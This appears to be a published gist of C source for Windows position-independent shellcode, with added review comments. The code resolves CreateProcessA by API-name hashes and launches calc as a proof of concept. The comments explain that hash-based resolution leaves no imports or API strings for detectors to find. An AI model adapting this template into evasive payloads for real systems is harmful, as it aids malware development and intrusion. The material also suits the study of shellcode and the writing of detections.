Created
July 21, 2019 18:58
CreateProcessA C payload converted into a shellcode payload with the help of http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
#define WIN32_LEAN_AND_MEAN
#pragma warning( disable : 4201 )   /* MSVC C4201: nameless struct/union extension */
/* Declares GetProcAddressWithHash(); its implementation is not part of this listing. */
#include "GetProcAddressWithHash.h"
#include <windows.h>
#include <intrin.h>
/* Function-pointer types for the exports resolved at runtime in ExecutePayload().
 * WINAPI must match the calling convention of the real exports or the call is
 * mis-framed. NOTE(review): CREATEPROCESSA names the ANSI export, yet its string
 * and STARTUPINFO parameters use the TCHAR-dependent LPCTSTR/LPSTARTUPINFO types;
 * only a build without UNICODE defined matches the real CreateProcessA prototype. */
typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
typedef BOOL(WINAPI * CREATEPROCESSA)(LPCTSTR, LPCTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
/* Machine type of the current build; not referenced anywhere else in this listing. */
#ifdef _WIN64
#define HOST_MACHINE IMAGE_FILE_MACHINE_AMD64
#else
#define HOST_MACHINE IMAGE_FILE_MACHINE_I386
#endif
/* Precomputed name hashes handed to GetProcAddressWithHash(). The hash function
 * lives behind that header, so the values cannot be verified from this file.
 * Resolving exports by hash leaves no import-table entries or API-name strings in
 * the binary; that absence is exactly what import-based and string-based
 * detections look for. DLL_KERNEL32_HASH is not used in this listing. */
#define DLL_KERNEL32_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0x726774c
#define GETPROCADDRESS_HASH 0x7802f749
#define CREATEPROCESSA_HASH 0x863FCC79
/* Hand-declared counted string; presumably mirrors the native UNICODE_STRING
 * layout (two USHORT lengths followed by a wide-char buffer pointer). Only the
 * field offsets matter -- it is embedded in _PEB below and never read directly
 * in this listing. */
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
/* Singly linked free-block record referenced from _PEB::pFreeList. Declared only
 * so the PEB layout below has the right size at that offset; nothing in this
 * listing walks the list. */
typedef struct _PEB_FREE_BLOCK
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
/* Hand-declared mirror of the Process Environment Block. Code that walks this
 * structure depends on the offsets matching the running OS exactly; a mismatch
 * silently reads the wrong field rather than failing. NOTE(review): the DWORD-sized
 * counters and the 34-entry GDI handle buffer look like the 32-bit layout -- confirm
 * before relying on it in a 64-bit build. Nothing in this listing dereferences a
 * _PEB; the module/export lookup presumably happens inside GetProcAddressWithHash(). */
typedef struct __PEB
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;                 /* the byte IsDebuggerPresent() reports */
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;           /* base of the main executable image */
PPEB_LDR_DATA pLdr;                  /* loader data: the in-memory module lists */
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;                /* heap/loader debug flags; also read by anti-debug checks */
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];         /* 34 entries -- see the layout note above */
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, *_PPEB;
#pragma warning( push )
#pragma warning( disable : 4214 ) // nonstandard extension: bit-field type other than int
/* One 16-bit entry of a PE base-relocation block: low 12 bits are the offset within
 * the page, high 4 bits the relocation type. Not used in this listing (there is no
 * relocation processing here); presumably left over from a reflective-loader source. */
typedef struct
{
WORD offset : 12;
WORD type : 4;
} IMAGE_RELOC, *PIMAGE_RELOC;
#pragma warning(pop)
/* Round `value` up to the next multiple of `alignment`. The mask arithmetic only
 * yields a correct result when `alignment` is a power of two; an already-aligned
 * value is returned unchanged. No caller in this listing. */
static inline size_t
AlignValueUp(size_t value, size_t alignment) {
    const size_t mask = alignment - 1;
    const size_t bumped = value + mask;
    return bumped & ~mask;
}
/* Entry point of the position-independent payload: resolves CreateProcessA through
 * the hash lookup and spawns "calc". All state lives on the stack and no import
 * table is touched, which is what lets the compiled function be lifted out as raw
 * shellcode (see the gist description). Returns nothing; the CreateProcessA result
 * is ignored. */
VOID ExecutePayload(VOID)
{
#pragma warning( push )
#pragma warning( disable : 4055 )   /* MSVC C4055: data-pointer -> function-pointer casts below */
/* NOTE(review): this push has no matching pop before the function ends, so C4055
 * stays disabled for the rest of the translation unit. */
/* Logic for the initial entrypoint of the PIC Shellcode; Should start the new TRIGGER */
LOADLIBRARYA fLoadLibrary;          /* resolved below but never called */
GETPROCADDRESS fGetProcAddress;     /* resolved below but never called */
CREATEPROCESSA fCreateProcessA;
STARTUPINFO si;
PROCESS_INFORMATION pi;
/* SecureZeroMemory is presumably an inline from the SDK headers, so it needs no
 * resolved import; it zeroes both structs before the call. */
SecureZeroMemory(&si, sizeof(si));
SecureZeroMemory(&pi, sizeof(pi));
/* Strings must be stored in an array */
/* A brace-initialized char array is materialized on the stack rather than as a
 * pointer into .rdata, which position-independent code has no fixed address for. */
char cmd[] = { 'c', 'a', 'l', 'c', 0 };
/* resolve all functions at runtime. */
/* GetProcAddressWithHash() is implemented behind the included header (not shown);
 * its result is never checked for NULL, so an unresolved export would be called
 * through a null function pointer. */
fLoadLibrary = (LOADLIBRARYA)GetProcAddressWithHash(LOADLIBRARYA_HASH);
fGetProcAddress = (GETPROCADDRESS)GetProcAddressWithHash(GETPROCADDRESS_HASH);
fCreateProcessA = (CREATEPROCESSA)GetProcAddressWithHash(CREATEPROCESSA_HASH);
/* NOTE(review): a literal instead of sizeof(si); whether 68 equals sizeof(STARTUPINFO)
 * depends on the build (pointer size, UNICODE), so confirm it per configuration. */
si.cb = 68;
/* bInheritHandles is TRUE, so the child inherits this process's inheritable handles.
 * The BOOL return and the two handles written into pi are never checked or closed.
 * The (LPCTSTR) cast hides a char* -> TCHAR* mismatch when UNICODE is defined. */
fCreateProcessA(0, (LPCTSTR)cmd, 0, 0, TRUE, 0, 0, 0, &si, &pi);
}